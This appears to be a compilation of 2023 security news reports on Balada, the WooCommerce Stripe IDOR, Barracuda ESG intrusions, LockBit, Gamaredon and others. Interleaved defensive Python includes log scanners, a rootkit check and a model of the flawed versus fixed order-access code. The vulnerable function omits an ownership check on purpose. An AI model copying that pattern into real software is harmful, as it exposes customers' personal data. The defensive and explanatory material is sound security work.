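            findings.append((r["Name"], f"vendor {vendor} but level {level}"))
    return findings


if __name__ == "__main__":
    for name, reason in suspicious_vibs(parse_vib_list(SAMPLE)):
        print(f"INVESTIGATE {name}: {reason}")
```

A hit is a lead, not proof: confirm with `esxcli software vib signature verify`, compare the file list of the VIB against a known-good host, and check the host’s acceptance level itself (`esxcli software acceptance get`), since an attacker with root can lower it to allow unsigned packages in the first place.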
“UNC3886 continues to target devices and platforms that traditionally lack EDR solutions and make use of zero-day exploits on those platforms. UNC3886 continues to present challenges to investigators by disabling and tampering with logging services, selectively removing log events related to their activity.” concludes the report. “The threat actors’ retroactive cleanup performed within days of past public disclosures on their activity indicates how vigilant they are.”
Learn the shocking truth behind the Balada Injector campaign and find out how to protect your organization from this relentless viral invasion.
A deadly cyber campaign has been working silently to undermine website security by exploiting popular WordPress plugins — infiltrating over a million websites and leaving administrators scrambling for solutions.
In April 2023, BleepingComputer and other tech outlets like TechRadar began circulating reports of cybercriminals successfully hacking WordPress websites. The attackers gained access via a toxic combination of the popular plugins Elementor Pro Premium (webpage builder) and WooCommerce (online storefront).
Initially attributed to security researcher Jérôme Bruandet of NinTechNet, this recently disclosed vulnerability carries a base CVSS score of 8.8 (High), giving WordPress administrators and cybersecurity teams much to fret over.
As of May 2023, an official CVE designation was still pending. Websites running Elementor Pro 3.11.6 or earlier alongside an activated WooCommerce plugin are advised to upgrade Elementor Pro to at least 3.11.7; otherwise authenticated users (think standard e-commerce customers) can achieve total control of the website by exploiting a Broken Access Control flaw, the most severe category in OWASP’s Top 10.
While reports of this vulnerability have circulated widely across the web, a lesser-known but directly related set of activities has been occurring on a similar front against these and other standard WordPress plugins.
This article will focus on the widespread and highly persistent malware injector campaign “Balada,” which has reportedly infected over 1 million individual websites by exploiting weaknesses in Elementor Pro, WooCommerce, and several other WordPress plugins. This article will provide a brief history of the Balada Injector, its common objectives, common Indicators of Compromise (IoC), and a quick exploitation overview, including some general tips that organizations should adopt to avoid being the next victim.
What is Balada?
Cybersecurity firm Sucuri has been tracking Balada Injector activity since 2017 but only recently gave this long-running campaign its name. Primarily leveraging functions written in the Go language, “Balada”, which translates to “Ballad” in several languages, achieves initial infection through commonly known but unpatched WordPress plugin, theme, or other software vulnerabilities.
Balada then attempts to spread itself and maintain persistence by executing a series of rehearsed attacks, cross-site infections, and backdoor installations, living up to its name. The Elementor Pro and WooCommerce compromise path allows authenticated users to modify WordPress configuration to create administrator accounts or inject URL redirects into website pages or posts. The malware then harvests database credentials, archive files, log data, or valuable documents that are not adequately secured, while establishing numerous Command and Control (C2) channels for persistence.
Balada is not an overly shy malware campaign. Sucuri notes that injection activities follow a defined monthly schedule that generally starts on the weekend and ends around mid-week on a predictable cycle.
Balada favors exploiting Linux-based hosts, but Microsoft-based web servers like IIS are not immune. Adhering to practices seen in other contemporary malware campaigns, Balada leverages newly-registered domains consisting of random, unrelated words to entice clicks and user redirection to websites that deliver malicious payloads.
These websites will often take the guise of fake IT Support services, cash prize notifications, or even security verification services like CAPTCHAs. The below infographic summarizes the initial attack vectors that Balada will seek to exploit, services or plugins it attempts to abuse, and some of its more recognized persistence vectors. Defensive measures will be summarized towards the end of the article, as Balada is notoriously difficult to remove once it has embedded itself.
Basic Balada Injector workflow and capabilities against a WordPress CMS.
Identifying Balada injections
Sucuri’s research further established that Balada’s primary malware routine is typically located in the following path on compromised victim devices “C:/Users/host/Desktop/balada/client/main.go”. A semi-maintained Virus Total collection highlights common file hashes, URLs, and other indicators associated with Balada-delivered malware and its infections.
Balada also leverages a dated but recurring User-Agent “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36” which has been observed by Sucuri repeatedly in compromised machine logs starting in late 2020 and well into the current period. Balada activity has been associated with well over 100 unique domains since 2017. Balada leverages a “main.ex_domains” function to store and reuse domains for future attacks as successful infections or compromises occur in its monthly campaigns.
The below table highlights a small portion of the common domains observed in recently analyzed injector campaigns. Sucuri was contacted for comment in May 2023 to determine if an APT group was attributed to these attacks, with no formal response issued.
Exploitation walkthrough
The following section will highlight a high-level walkthrough demonstrating how a WordPress installation that leverages the vulnerable versions of Elementor Pro and WooCommerce can be exploited. The demonstration can be recreated on a Kali Linux VM, with a Bitnami WordPress Docker container running inside of Kali. It is not advised that readers attempt to recreate these conditions, attempt to download and use known vulnerable software in any capacity, or attempt these exploitation techniques against systems not owned by the reader. Proceed at your own risk!
Unauthenticated users can leverage the vulnerability by simply registering for a WooCommerce user account then querying the backend AJAX action as such:
After updating values such as “siteurl,” SQL queries can be run to determine the destination specified and whether autoload is enabled. Certain web application firewalls (WAF) will purportedly provide adequate protection against exploitation, but upgrading Elementor Pro immediately is recommended if version 3.11.6 or earlier is in use.
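Two defender-side checks for the indicators discussed above, written here as an added example rather than code from Sucuri or from the campaign: the first scans web server access logs for the recurring User-Agent quoted in the “Identifying Balada injections” section and escalates admin-ajax.php POSTs from it, the second verifies the siteurl/home options and their autoload flag as the walkthrough suggests. The log lines, the wp_options rows and the expected hostname are constructed.

```python
"""Defender-side checks for two Balada indicators: the recurring User-Agent
reported by Sucuri and tampering with the WordPress siteurl/home options.
Added example; not Sucuri's or Balada's code. Sample data is constructed."""
import re
from urllib.parse import urlparse

# User-Agent quoted on the page as recurring in Balada-compromised logs.
BALADA_UA = ("Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36")

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample lines: ordinary browser traffic plus Balada-style requests.
SAMPLE_LOG = [
    '198.51.100.10 - - [12/May/2023:09:15:02 +0000] "GET /shop/ HTTP/1.1" 200 5120 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/113.0.0.0 Safari/537.36"',
    '203.0.113.5 - - [13/May/2023:02:41:17 +0000] "GET /wp-login.php?action=register HTTP/1.1" '
    '200 3400 "-" "' + BALADA_UA + '"',
    '203.0.113.5 - - [13/May/2023:02:41:55 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" '
    '200 31 "-" "' + BALADA_UA + '"',
    'garbage line that does not parse',
]


def parse_line(line):
    """Return the fields of a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(lines):
    """Flag requests carrying the Balada User-Agent; escalate admin-ajax.php POSTs,
    the channel through which the Elementor Pro flaw above is reached."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ua"] != BALADA_UA:
            continue
        is_ajax_post = (rec["method"] == "POST" and
                        rec["path"].split("?")[0].endswith("/wp-admin/admin-ajax.php"))
        findings.append({"ip": rec["ip"], "time": rec["time"], "method": rec["method"],
                         "path": rec["path"], "severity": "high" if is_ajax_post else "medium"})
    return findings


def check_site_urls(option_rows, expected_host):
    """option_rows: (option_name, option_value, autoload) tuples as read from wp_options.
    siteurl and home must point at the expected host; WordPress autoloads both by
    default, so a changed autoload flag is reported as well."""
    issues = []
    for name, value, autoload in option_rows:
        if name not in ("siteurl", "home"):
            continue
        host = (urlparse(value).hostname or "").lower()
        if host != expected_host.lower():
            issues.append(f"{name} points to {host!r}, expected {expected_host!r}")
        if autoload != "yes":
            issues.append(f"{name} autoload is {autoload!r}, expected 'yes'")
    return issues


# Constructed wp_options rows: "home" has been redirected off-site.
SAMPLE_OPTIONS = [
    ("siteurl", "https://shop.example.test", "yes"),
    ("home", "https://redirect.invalid/start", "yes"),
    ("blogname", "Example Shop", "yes"),
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['method']} {f['path']} at {f['time']}")
    for issue in check_site_urls(SAMPLE_OPTIONS, "shop.example.test"):
        print("[wp_options]", issue)
```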
Defensive control considerations
So far, the article has covered how Balada seeks to achieve an initial compromise, the specific types of files and information it targets, and some common infection techniques. Organizations can consider the guidance below to help them prevent Balada infections or determine when infections may have occurred.
Some advice is self-evident, like ensuring web server hosts, website plugins, themes, and related software remain current and up to date. Some is less obvious, such as ensuring sound DNS security through solutions like Cisco Umbrella or DNSFilter. These capabilities provide network-level or roaming client protection that identifies and then blocks redirection attempts and DNS requests to known malicious sites. Organizations should also enforce a strong password policy (complexity, 16+ characters, etc.), require privileged users to satisfy multifactor authentication or other conditional access policies, and generate alerts to the appropriate teams whenever a privileged account is created. Organizations should also strongly consider implementing or routinely assessing the following:
Routinely audit plugins, themes and other software to confirm they are strictly necessary for web application operations. Remove all unnecessary or unused software.
Conduct internal and routine penetration testing or similar assessments against web applications to identify exploitable weaknesses before Balada does.
Enable File Integrity Monitoring (FIM) against critical system files.
Heavily restrict access to sensitive files like wp-config, website backup data, log files or database archives and ensure strong data retention policies purge older versions of this data when no longer needed.
Disable unnecessary or insecure server services and protocols like FTP.
Subscribe to security alerts via US CISA, MS-ISAC or other reputable threat intelligence services to learn about critical software and system vulnerabilities.
If you want to read the summary, take a look at the original post at
Hundreds of thousands of online stores are potentially exposed to hacking due to a critical vulnerability in the WooCommerce Stripe Payment Gateway plugin.
The Stripe plugin extends WooCommerce allowing administrators of the e-commerce sites to take payments directly on their store via Stripe’s API.
Stripe is a simple way to accept payments online, it supports Visa, MasterCard, American Express, Discover, JCB, and Diners Club cards, even Bitcoin payment channels.
The plugin is very popular and has more than 900,000 active installations.
A security flaw has been uncovered in the WooCommerce Stripe Gateway WordPress plugin that could lead to the unauthorized disclosure of sensitive information.
The vulnerability is an unauthenticated insecure direct object reference (IDOR) issue that impacts versions 7.4.0 and below. An attacker can exploit the vulnerability to bypass authorization and access sensitive information.
“This plugin suffers from an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability allows any unauthenticated user to view any WooCommerce order’s PII data including email, user’s name, and full address.” reads the advisory published by security firm Patchstack. “The described vulnerability was fixed in version 7.4.1 with some backported fixed version and assigned CVE-2023-34000.”
The issue resides in the javascript_params function and the way order objects are handled; specifically, the experts noticed that there is no proper access control on the ‘javascript_params’ and ‘payment_fields’ functions.
“Notice that the code will fetch an order object to $order variable using the $order_id variable. The $order_id variable is constructed from $wp->query_vars[‘order-pay’]. According to the query_vars documentation, this hook could be used to fetch parameter from the GET parameters. The code then will construct a $stripe_params variable with details from the $order object such as user’s full name and full address.” continues the advisory. “There is no orders ownership check on the rest of the function code and the function will return $order as an object. When traced, the javascript_params variable could be called from the payment_scripts function”
The experts noticed that the issue was addressed by implementing the validation of the fetched order ownership. The check is implemented through the is_valid_pay_for_order_endpoint function which will check the order based on the key and ownership.
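The flawed flow and the fix described above, modelled in Python as an added example (this is not the plugin's PHP): the vulnerable entry point builds the order's PII straight from the order-pay query variable, while the fixed one first requires the order key and, for a registered customer's order, a matching user id. The in-memory order store, the guest-order rule and the function signatures are assumptions.

```python
"""Model of the CVE-2023-34000 authorization flaw and of the ownership check
that fixes it. Added example in Python, not the plugin's PHP; the order store,
the guest-order rule and the function shapes are assumptions. Orders are constructed."""
import hmac
from dataclasses import dataclass


@dataclass(frozen=True)
class Order:
    order_id: int
    user_id: int        # 0 for guest checkout, as WooCommerce stores it
    order_key: str      # secret per-order key carried in pay-for-order links
    billing_email: str
    billing_name: str
    billing_address: str


# Constructed sample orders standing in for wc_get_order() results.
ORDERS = {
    1001: Order(1001, 7, "wc_order_k7f3Lm2Q", "alice@example.test",
                "Alice Example", "1 Main St, Springfield"),
    1002: Order(1002, 0, "wc_order_g9q1Zx8R", "guest@example.test",
                "Guest Buyer", "2 Side Rd, Shelbyville"),
}


def _order_from_query(query_vars):
    """Resolve the order-pay query variable to an order, as the flawed code did."""
    try:
        return ORDERS.get(int(query_vars.get("order-pay", 0)))
    except (TypeError, ValueError):
        return None


def stripe_params_for(order):
    """The PII the vulnerable function placed in its $stripe_params array."""
    return {"billing_email": order.billing_email,
            "billing_name": order.billing_name,
            "billing_address": order.billing_address}


def javascript_params_vulnerable(query_vars, current_user_id):
    """Flawed flow: fetch the order named in the query vars and return its
    details with no check that the requester owns it."""
    order = _order_from_query(query_vars)
    return stripe_params_for(order) if order else None


def is_valid_pay_for_order_endpoint(order, query_vars, current_user_id):
    """Modelled on the fix: the request must carry the order's key, and a
    registered customer's order may only be viewed by that customer."""
    supplied_key = str(query_vars.get("key", ""))
    if not hmac.compare_digest(supplied_key, order.order_key):
        return False
    if order.user_id != 0 and order.user_id != current_user_id:
        return False
    return True


def javascript_params_fixed(query_vars, current_user_id):
    """Same entry point with the ownership check applied before any PII is built."""
    order = _order_from_query(query_vars)
    if order is None or not is_valid_pay_for_order_endpoint(order, query_vars, current_user_id):
        return None
    return stripe_params_for(order)


if __name__ == "__main__":
    anonymous = 0
    print("vulnerable, anonymous, id only:", javascript_params_vulnerable({"order-pay": "1001"}, anonymous))
    print("fixed, anonymous, id only:     ", javascript_params_fixed({"order-pay": "1001"}, anonymous))
    print("fixed, owner with key:         ",
          javascript_params_fixed({"order-pay": "1001", "key": "wc_order_k7f3Lm2Q"}, 7))
```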
Below is the disclosure timeline for the above issue:
17 April 2023 – We found the vulnerability and reached out to the plugin vendor.
30 May 2023 – WooCommerce Stripe Gateway version 7.4.1 was published to patch the reported issues.
13 June 2023 – Added the vulnerabilities to the Patchstack vulnerability database.
13 June 2023 – Published the article.
Microsoft linked a series of wiping attacks to a Russia-linked APT group, tracked as Cadet Blizzard, that is under the control of the GRU.
Microsoft attributes the operations carried out by the Russia-linked APT group tracked as Cadet Blizzard to the Russian General Staff Main Intelligence Directorate (GRU). The IT giant pointed out that Cadet Blizzard is distinct from other known APT groups operating under the control of the Russian military intelligence GRU, such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM).
Unlike other Russia-linked APT groups, Cadet Blizzard’s operations are extremely disruptive.
The Microsoft Threat Intelligence Center (MSTIC) initially tracked Cadet Blizzard as DEV-0586; the group was observed conducting destructive malware attacks against multiple organizations in Ukraine in January 2022.
The activity of the group was spotted a month before the invasion of Ukraine; Cadet Blizzard is the group that created and deployed the WhisperGate wiper. The group was also observed defacing the websites of several Ukrainian organizations.
Microsoft believes that the group has been active since at least 2020, it focused on government services, law enforcement, non-profit/non-governmental organizations, IT service providers/consulting, and emergency services in Ukraine.
“Cadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022.” reads the report published by Microsoft. “Cadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard’s activity peak between January and June 2022, followed by an extended period of reduced activity.”
Microsoft observed a new surge in the activity of the group in January 2023, when the APT conducted multiple operations against entities in Ukraine and in Europe. The researchers noticed that the APT group is active seven days a week and conducted its operations during its primary European targets’ off-business hours. The researchers warn that the APT group may target NATO member states supporting the military operations of the Ukrainian government.
Microsoft provided indicators of compromise to investigate environments and assess for potential compromise.
The LockBit ransomware group successfully extorted roughly $91 million from approximately 1,700 U.S. organizations since 2020.
According to a joint advisory published by cybersecurity agencies, the LockBit ransomware group has successfully extorted roughly $91 million in about 1,700 attacks against U.S. organizations since 2020.
The advisory was published by Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international agencies:
Australian Cyber Security Centre (ACSC)
Canadian Centre for Cyber Security (CCCS)
United Kingdom’s National Cyber Security Centre (NCSC-UK)
National Cybersecurity Agency of France (ANSSI)
Germany’s Federal Office for Information Security (BSI)
New Zealand’s Computer Emergency Response Team (CERT NZ) and National Cyber Security Centre (NCSC NZ)
With U.S. & international partners, we published a joint advisory on LockBit Ransomware: https://t.co/q8zAaaue6h
— Cybersecurity and Infrastructure Security Agency (@CISAgov) June 14, 2023
The LockBit ransomware operation was the most active in 2022 and according to the researchers it is one of the most prolific RaaS in 2023. The operation targeted many organizations in critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The advisory highlights that due to the large number of unconnected affiliates in RaaS, the TTPs observed in the LockBit ransomware attacks have a significant variance.
Lockbit was responsible for 18% of the total reported Australian ransomware incidents from April 1, 2022, to March 31, 2023.
16% of the State, Local, Tribal, and Territorial (SLTT) government ransomware incidents reported to the MS-ISAC in 2022 were LockBit attacks. The group targeted municipal governments, county governments, public higher education and K-12 schools, and emergency services (e.g., law enforcement).
According to the French ANSSI cybersecurity agency, LockBit 3.0 was the prevalent variant in 2023. The agency also observed two cases where victims were infected with as many as three different strains of LockBit (LockBit 2.0/Red, LockBit 3.0/Black, and LockBit Green).
Cybersecurity agencies monitored data leak sites to record the victims of the operation, however, these darkweb sites only show the portion of LockBit affiliates’ victims subjected to secondary extortion.
“Because LockBit only reveals the names and leaked data of victims who refuse to pay the primary ransom to decrypt their data, some LockBit victims may never be named or have their exfiltrated data posted on leak sites. As a result, the leak sites reveal a portion of LockBit affiliates’ total victims.” reads the joint advisory. “For these reasons, the leak sites are not a reliable indicator of when LockBit ransomware attacks occurred. The date of data publication on the leak sites may be months after LockBit affiliates actually executed ransomware attacks. Up to the Q1 2023, a total of 1,653 alleged victims were observed on LockBit leak sites”.
The report also provides a list of legitimate freeware and open-source tools used by the LockBit affiliates in their ransomware attacks along with a list of commonly observed vulnerabilities and exposures (CVEs) exploited by the threat actors.
The advisory includes recommended mitigation measures to prevent LockBit ransomware attacks.
Russia-linked APT group Gamaredon is using a new toolset in attacks aimed at critical organizations in Ukraine.
The Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa) continues to carry out attacks against entities in Ukraine, including security services, military, and government organizations.
Symantec researchers reported that in some cases, the cyberespionage group remained undetected in the target networks for three months. The threat actors focus on stealing sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
Gamaredon is a persistent cyber espionage operation attributed to Russia’s FSB (Federal Security Service), conducted as part of a long-term military and geopolitical confrontation with the Ukrainian government and, more generally, with the Ukrainian military.
Gamaredon has been active since 2014 and its activity focuses on Ukraine; the group was observed using the multistage backdoor Pteranodon/Pterodo.
Symantec pointed out that the group has repeatedly refreshed its toolset to avoid detection; the researchers discovered new versions of known tools and observed the group using short-lived infrastructure.
The attack chain commences with spear-phishing emails carrying malicious attachments (.docx, .rar, .sfx (self-extracting archives), .lnk, .hta (HTML smuggling files)) that use armed conflicts, criminal proceedings, combating crime, and protection of children as lures.
The group recently used new variants of the Pteranodon implant that are distributed using a new PowerShell script.
“Shuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality.” reads the report published by Symantec. “The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.”
The PowerShell script used in recent attacks first copies itself onto the infected system and creates a shortcut file with an rtk.lnk extension. The script then uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk” and “evidence.rtf.lnk” in an attempt to trick individuals into opening the files.
A novelty observed in the recent attacks is the use of USB propagation.
The script also enumerates all drives and copies itself to removable disks – USB drives connected to the system. Threat actors use USB drives for lateral movement, and potentially target air-gapped networks.
In these recent attacks, the APT group used legitimate services as C&C servers, including the Telegram messaging service and Telegram’s micro-blogging platform, Telegraph.
Most of the attacks began in February/March 2023 and threat actors remained undetected in the target networks until May. In some attacks threat actors successfully breached the victims’ human resources departments in an attempt to gather intelligence on the personnel at the various organizations.
The report published by Symantec includes indicators of compromise for the recent attacks.
Experts linked the UNC4841 threat actor behind the attacks exploiting the recently patched Barracuda ESG zero-day to China.
Mandiant researchers linked the threat actor UNC4841 behind the attacks that exploited the recently patched Barracuda ESG zero-day vulnerability to China.
“Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for espionage, spanning a multitude of regions and sectors.” reads the report published by Mandiant. “Mandiant assesses with high confidence that UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People’s Republic of China.”
At the end of May, the network security solutions provider Barracuda warned customers that some of its Email Security Gateway (ESG) appliances were recently breached by threat actors exploiting a now-patched zero-day vulnerability.
The vulnerability, tracked as CVE-2023-2868, resides in the module for email attachment screening; the issue was discovered on May 19 and the company fixed it with two security patches released on May 20 and 21.
The issue could have a significant impact because the impacted Email Security Gateway (ESG) appliances are used by hundreds of thousands of organizations worldwide, including several high-profile businesses.
The vulnerability doesn’t impact other Barracuda products; the company states that its SaaS email security services are not affected by this issue.
The company investigated the flaw and discovered that it was exploited to target a subset of email gateway appliances. The company notified via the ESG user interface the customers whose appliances they believe were impacted.
On May 30, 2023, the vendor provided a Preliminary Summary of Key Findings related to its investigation that includes a timeline of events, Indicators of Compromise (IOCs), and recommended actions for impacted customers.
As per the vendor’s statement, the flaw has been exploited in real-world scenarios, with incidents dating back to October 2022 at the very least.
“Earliest identified evidence of exploitation of CVE-2023-2868 is currently October 2022.” reads the update provided by the company.
Threat actors exploited the flaw CVE-2023-2868 to obtain unauthorized access to a subset of ESG appliances. Barracuda, with the support of Mandiant, discovered the issue was exploited to deploy malware on a subset of appliances allowing for persistent backdoor access.
The company confirmed that the CVE-2023-2868 was first exploited in October 2022.
The families of malware employed in the attacks are:
SALTWATER – A malware-laced module for the Barracuda SMTP daemon (bsmtpd) that supports multiple capabilities such as uploading/downloading arbitrary files, executing commands, as well as proxying and tunneling malicious traffic to avoid detection. The backdoor component is constructed by leveraging hooks on the send, recv, and close system calls, comprising a total of five distinct components referred to as “Channels” within the binary.
SEASPY – An x64 ELF persistent backdoor that masquerades as a legitimate Barracuda Networks service and poses as a PCAP filter, specifically monitoring traffic on port 25 (SMTP). SEASPY also supports backdoor functionality that is activated by a “magic packet”.
SEASIDE is a module written in Lua for bsmtpd, it establishes a reverse shell via SMTP HELO/EHLO commands sent via the malware’s C2 server.
Last week the company published a new statement urging customers to immediately replace the ESG appliances, regardless of patch version level.
“Impacted ESG appliances must be immediately replaced regardless of patch version level. If you have not replaced your appliance after receiving notice in your UI, contact support now ([email protected]).” urges the company. “Barracuda’s remediation recommendation at this time is full replacement of the impacted ESG.”
According to Mandiant, starting as early as October 10, 2022, the UNC4841 group sent spear-phishing emails to victim organizations. The email contained a weaponized attachment crafted to exploit the flaw CVE-2023-2868 to access vulnerable Barracuda ESG appliances.
Once the ESG device was compromised, UNC4841 was observed stealing specific data of interest, and in some cases the attackers used their access to the appliance for lateral movement or to send mail to other victim appliances. The threat actors also deployed additional tools to maintain a presence on ESG appliances.
“Observed emails contained generic email subject and body content, usually with poor grammar and in some cases still containing placeholder values.” continues the report. “Mandiant assesses UNC4841 likely crafted the body and subject of the message to appear as generic spam in order to be flagged by spam filters or dissuade security analysts from performing a full investigation. Mandiant has observed this tactic utilized by advanced groups exploiting zero-day vulnerabilities in the past.”
Mandiant researchers also reported that UNC4841 used a rootkit dubbed SANDBAR, in the form of a trojanized network file system kernel module for Linux (nfsd_stub.ko). The rootkit relies on hooks to hide processes whose names begin with a specified string.
“SANDBAR hides the process ID from being displayed when the /proc filesystem is queried. SANDBAR hooks the “iterate_shared” routine of the “file_operations” structure for the /proc filesystem and the subsequent “filldir” callback to hide the process. It appears to be adapted from publicly available rootkit code.” continues the report.
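A check for the hiding technique described above, added here as an example and not code from Mandiant or from SANDBAR: because the hook filters /proc directory iteration, a hidden PID still resolves by direct lookup of /proc/<pid>/status, so the two views disagree. It assumes the lookup path is not also hooked, and it filters out non-leader threads, which resolve by lookup but are never listed; FakeProc is a constructed stand-in for /proc.

```python
"""Listing-versus-lookup check for PIDs hidden from /proc iteration.
Added example; not Mandiant's or SANDBAR code. Assumes only directory
iteration (iterate_shared/filldir) is hooked, as described for SANDBAR."""
import os


def read_pid_max(path="/proc/sys/kernel/pid_max", default=32768):
    """Upper bound for the scan; falls back to the traditional default."""
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return default


def list_proc_pids(listdir=os.listdir):
    """PIDs as reported by iterating /proc, the path a filldir hook can filter."""
    return {int(name) for name in listdir("/proc") if name.isdigit()}


def proc_tgid(pid):
    """Thread-group id read via direct lookup of /proc/<pid>/status, or None if
    the PID does not resolve. Non-leader threads also resolve here but are never
    listed in /proc, so callers must compare Tgid with the PID."""
    try:
        with open(f"/proc/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except (OSError, ValueError, IndexError):
        return None
    return None


def find_hidden_pids(max_pid, listdir=os.listdir, tgid_of=proc_tgid):
    """PIDs that resolve by lookup as thread-group leaders but are absent from
    two successive listings. The second listing removes processes that merely
    started between the first listing and the probe."""
    def hidden_leader(pid, listed):
        return pid not in listed and tgid_of(pid) == pid

    before = list_proc_pids(listdir)
    suspects = [pid for pid in range(1, max_pid + 1) if hidden_leader(pid, before)]
    if not suspects:
        return []
    after = list_proc_pids(listdir)
    return [pid for pid in suspects if hidden_leader(pid, after)]


class FakeProc:
    """Constructed stand-in for /proc. `visible` PIDs appear in iteration,
    `hidden` PIDs resolve only by lookup, `threads` maps TID -> leader PID."""

    def __init__(self, visible, hidden=(), threads=None):
        self.visible, self.hidden = set(visible), set(hidden)
        self.threads = dict(threads or {})

    def listdir(self, path):
        assert path == "/proc"
        return [str(p) for p in sorted(self.visible)] + ["self", "sys", "cpuinfo"]

    def tgid(self, pid):
        if pid in self.visible or pid in self.hidden:
            return pid
        return self.threads.get(pid)


if __name__ == "__main__":
    fake = FakeProc(visible={1, 2, 500, 1234}, hidden={4242}, threads={1235: 1234})
    print("fake /proc, hidden leaders:", find_hidden_pids(5000, fake.listdir, fake.tgid))
    if os.path.isdir("/proc"):
        print("live /proc, hidden leaders:", find_hidden_pids(read_pid_max()))
```

Scanning the live /proc costs one lookup per PID up to pid_max, so the run in main can take a while on hosts with a large pid_max.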
The group also used trojanized versions of several legitimate Barracuda LUA modules, which contain the code to perform various operations when certain email-related events are received by the appliance.
The experts analyzed three trojanized modules that were grouped in two different malware families: SEASPRAY and SKIPJACK.
Most of the attacks observed by Mandiant targeted the Americas (55%), followed by EMEA (24%) and APAC (22%). Almost one in three affected organizations was a government agency, a circumstance that suggests the attacks were carried out as part of a cyber espionage campaign.
“Mandiant assesses with high confidence that UNC4841 conducted espionage activity in support of the People’s Republic of China. While Mandiant has not attributed this activity to a previously known threat group at this time, we have identified several infrastructure and malware code overlaps that provide us with a high degree of confidence that this is a China-nexus espionage operation.” concludes the report. “Additionally, the targeting, both at the organizational and individual account levels, focused on issues that are high policy priorities for the PRC, particularly in the Asia Pacific region including Taiwan.”
An updated version of the Android remote access trojan GravityRAT can steal WhatsApp backup files and can delete files.
ESET researchers discovered an updated version of Android GravityRAT spyware that steals WhatsApp backup files and can delete files. The malware is distributed as the messaging apps BingeChat and Chatico.
MalwareHunterTeam researchers first shared the hash for a GravityRAT sample via a tweet.
GravityRAT was first spotted by Cisco Talos researchers in 2017, who speculated it had remained under the radar for at least a couple of years [since 2015].
The GravityRAT remote access trojan (RAT) is believed to be the work of Pakistani hacker groups; it was mainly employed in attacks aimed at Indian users.
The BingeChat campaign is still ongoing and has been active since August 2022, while the campaign using Chatico is no longer active. The researchers discovered that BingeChat is distributed through a website set up by threat actors to advertise free messaging services. ESET researchers discovered the website bingechat[.]net used to host the sample.
The latest version of GravityRAT can exfiltrate WhatsApp backups while providing legitimate chat functionality based on the open-source OMEMO Instant Messenger app, which is a rebuild of the Android Jabber client Conversations.
The website used to serve the app requires visitors to log in, but researchers didn’t have credentials, and the registration was closed.
“It is most probable that the operators only open registration when they expect a specific victim to visit, possibly with a particular IP address, geolocation, custom URL, or within a specific timeframe. Therefore, we believe that potential victims are highly targeted.” reads the analysis published by ESET. “Considering that downloading the app is conditional on having an account and new account registration was not possible for us, we believe that potential victims were specifically targeted.”
The malware stores data to be exfiltrated in text files on external media, exfiltrates them to the C2 server and then removes them.
“Known to have been active since at least 2015, SpaceCobra has resuscitated GravityRAT to include expanded functionalities to exfiltrate WhatsApp Messenger backups and receive commands from a C&C server to delete files.” concludes ESET that also provided indicators of compromise (IoCs) for this campaign.
Progress Software addressed a third vulnerability impacting its MOVEit Transfer application that could lead to privilege escalation and information disclosure.
Progress Software disclosed a new SQL injection vulnerability impacting its MOVEit Transfer application, it is the third issue fixed by the company after:
“Progress has discovered a vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment.” reads the advisory published by Progress. “If you are a MOVEit Transfer customer, it is extremely important that you take immediate action as noted below in order to help protect your MOVEit Transfer environment.”
To prevent unauthorized access to the installs, the vendor urges customers to immediately apply the following mitigation measures until they are able to apply the June 15th patch (CVE Pending):
1. Disable all HTTP and HTTPs traffic to your MOVEit Transfer environment. Customers have to modify firewall rules to deny HTTP and HTTPs traffic to the software on ports 80 and 443. These settings will have the following drawbacks:
Users will not be able to log on to the web UI of their MOVEit Transfer.
MOVEit Automation tasks that use the native MOVEit Transfer host will not work
REST, Java and .NET APIs will not work
MOVEit Transfer add-in for Outlook will not work
Recently Progress has released security updates to address new SQL injection vulnerabilities in the MOVEit Transfer application. An attacker can exploit the SQL injection vulnerabilities in the MOVEit Transfer solution to steal sensitive information.
The vulnerabilities were discovered by researchers from the cybersecurity firm Huntress.
